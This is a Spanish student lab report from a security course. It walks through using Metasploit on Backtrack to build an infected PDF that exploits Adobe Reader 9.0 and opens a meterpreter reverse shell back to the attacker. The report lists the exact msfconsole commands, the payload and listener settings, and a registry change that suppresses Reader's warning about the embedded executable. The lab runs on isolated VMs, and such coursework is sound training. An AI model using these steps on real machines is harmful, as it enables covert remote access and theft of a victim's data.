1. HACKING BACKTRACK 1
OBJETIVO DE LA PRÁCTICA
Desearemos desde un PC atacante hacer una conexión remota a un PC víctima.
Esta conexión será “malintencionada” y se realizará desde el puerto 4444 a través del Sistema
Operativo Backtrack creando un archivo .PDF infectado y enviándolo al PC víctima.
Una vez el PC victima abra el archivo, se abrirá un backdoor y desde el PC atacante podremos
acceder a la Shell de la víctima y podremos visualizar todo su contenido.
DETALLES A TENER EN CUENTA
La realización de esta práctica ha supuesto unas complicaciones externas debido a algunos
detalles que explicaremos a continuación.
Trabajaremos con MSFConsole en el entorno Backtrack.
Cuando se crea el PDF, tenemos que agregar la IP del Atacante en el comando lhost.
La versión de Adobe Reader que debe tener el cliente será la 9.0.
Se han editado los registros de Adobe Reader para permitir el uso del .exe.
Se ignorará el hecho de realizar la conexión con el puerto 443.
La víctima debe tener desactivado el Firewall.
2. ESQUEMA DE LA PRÁCTICA
Equipo atacante = 192.168.1.2
Equipo víctima = 192.168.1.3
Como podemos ver en el dibujo, ambos PCs deben estar conectados en la misma red para
realizarse el ataque. Para ello los hemos puesto a ambos en una VMnet juntos.
El Equipo víctima será quien tenga el .PDF infectado y quien será atacado por el equipo 1.2.
PROCEDIMIENTO DE LA PRÁCTICA
Para empezar la práctica, primero de todos tendremos que contar con un sistema operativo
llamado Backtrack, basado en distribuciones Linux. Este O.S. es una herramienta bastante
particular basada en este tipo de ejemplos y prácticas en cuanto a “jugar” con la red.
El primer paso será crear un archivo .PDF. Éste será la base de nuestro ataque. Gracias a él
podremos infectar a la víctima una vez abra el archivo que le enviaremos.
Abriremos la terminal del Backtrack y utilizaremos la MSFConsole. Esta consola se centra y
permite un acceso eficiente a las opciones relacionadas con los Exploits que se utilizarán.
Gracias a ésta, se facilita el uso de las herramientas.
3. CREACIÓN DEL PDF…
A la hora de crear el PDF, tenemos que tener en cuenta los siguientes comandos (que
utilizaremos):
use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs.
Sirve para decirle que vamos a utilizer un exploit con Adobe PDF embedded y un .exe como
extensión.
set payload windows/meterpreter/reverse_tcp
Es el Payload, que nos devolverá un Meterpreter. El Payload traducido es la carga útil, es la
información del envío de datos que usaremos para el ataque.
set lhost 192.168.1.2.
Añadiremos la IP del Atacante.
set filename vellimalote.pdf
Crearemos un PDF con el nombre indicado.
Exploit
Cargaremos el exploit para que se cree.
4. TRANSMISIÓN DEL ARCHIVO
Ahora, de cualquier forma tenemos que conseguir que la víctima reciba dicho archivo PDF
creado.
En este paso nosotros directamente lo hemos enviado o traspasado por un USB para facilitar el
uso de éste.
Localizaremos el archivo, en la ruta donde se ha guardado:
/msf4/local/vellimalote.pdf
*Hay dos archivos, vellimalo y vellimalote porque se hicieron varias pruebas. Pero el que nos
servirá y estamos utilizando es Vellimalote.pdf
Enviaremos el archivo a la máquina Windows 7, que será la víctima:
Hay que tener en cuenta, que la víctima debe tener un Adobe Reader inferior a la versión 9.3.
En nuestro caso utilizaremos la 9.0, que no dará muchos problemas a la hora de realizar la
apertura del archivo.
5. DETALLES DE ADOBE READER
La realización de la práctica ha sido ardua básicamente por los permisos y versiones de Adobe
Reader.
Para que funcionara 100% hemos hecho unos cambios, encontrados en Internet.
Actualizar el registro de Adobe Reader.
Después de una búsqueda exhaustiva por Internet, muchos usuarios coincidían en que
el registro de Adobe Reader debía ser cambiado.
Para ello utilizaremos la herramienta de Windows, “regedit” y seguiremos la siguiente
ruta:
HKEY_LOCAL_Machine / Software / Policies / Adobe / Acrobat Reader / 9.0 /
FeatureLockDown / cDefaultLaunchAttachmentPerms
Una vez dentro, veremos esto:
Editaremos el registro “BuiltInPermList” y le quitaremos la extensión .exe.
De esta forma, cuando abramos el archivo PDF no nos surgirá ningún mensaje molesto
relacionado con la infección o el mal uso del archivo.
6. EMPIEZA EL ATAQUE
Una vez solucionados todos los problemas con la víctima, realizaremos el ataque desde
nuestro atacante, valga la redundancia.
Utilizaremos los siguientes comandos:
Use exploit/multi/handler
Utilizaremos el controlador del Exploit.
Set payload Windows/meterpreter/reverse_tcp
Utilización del TCP (lo mismo que cuando creamos el PDF).
Set lhost 192.168.1.2
Agregamos la IP del atacante.
Exploit
Arrancamos el exploit.
El ataque será enviado mediante escucha. Es decir, que cuando la víctima abra el archivo
infectado (enviado anteriormente, el PDF) será cuando el atacante podrá entrar en la Shell del
usuario y entonces el ataque habrá sido realizado correctamente.
7. MODO ESCUCHA
La víctima abrirá el archivo PDF y comprobará que le sale una terminal extraña, que
desaparecerá al momento.
Cuando el usuario víctima ve esto, en la mayoría de los casos se despreocupa y sigue realizando
las tareas que estaba haciendo, pero realmente este ha sido el momento de infección, ya que el
atacante ha podido realizar la conexión.
El atacante estará esperando (modo escucha) y verá cómo se crea la conexión:
8. Dentro del parámetro meterpreter, ponemos “Shell” para meternos dentro del PC de la
víctima, sin que éste se dé cuenta de nada.
Y como podemos ver, ya estamos dentro del Desktop de la víctima:
A partir de ahora podemos navegar por el PC de la víctima y realizar maldades o simplemente
ser un cotilla y ver toda la información que tiene el usuario.
José Mª Vellido – ASIX2M
Hacking Backtrack 1 – SEGDISP
Fran Pérez – 2013/2014